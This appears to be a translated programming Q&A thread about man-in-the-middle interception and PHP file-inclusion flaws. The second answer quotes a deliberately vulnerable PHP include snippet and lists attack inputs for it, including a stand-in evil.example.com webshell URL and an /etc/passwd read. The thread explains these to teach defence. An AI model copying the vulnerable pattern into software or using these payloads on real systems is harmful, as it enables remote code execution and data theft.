我看到它在这个问题中提到:
那么有人如何“拦截”(并修改?)正在发送/接收的数据?(在那个问题中,它是一个用 fopen 读取的远程 PHP 文件)
问问题
75 次
2 回答
2
您可能想阅读有关中间人攻击的 Wikipedia 文章。
正如 PeeHaa 指出的那样,您可以使用 HTTPS 使用 SSL/TLS 加密您的 HTTP 流。
MITM 攻击不是 HTTP 特定的问题。此问题会影响流经不受信任网络的所有通信。
于 2012-07-28T16:45:21.523 回答
1
这个来自维基百科的例子可能会让你认识到不良影响。
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>
COLOR=http://evil.example.com/webshell.txt - 注入包含恶意代码的远程托管文件
COLOR=/etc/passwd - 允许攻击者在 UNIX 系统目录遍历上读取 passwd 文件的内容
/vulnerable.php?COLOR=C:\ftp\upload\exploit - 从已上传的名为exploit.php的文件中执行代码(本地文件包含漏洞)
我希望从这些例子中,潜伏的危险对你来说更清楚。
“脚本之外的不受信任的数据需要验证”以减轻这些攻击。
于 2012-07-28T16:55:15.223 回答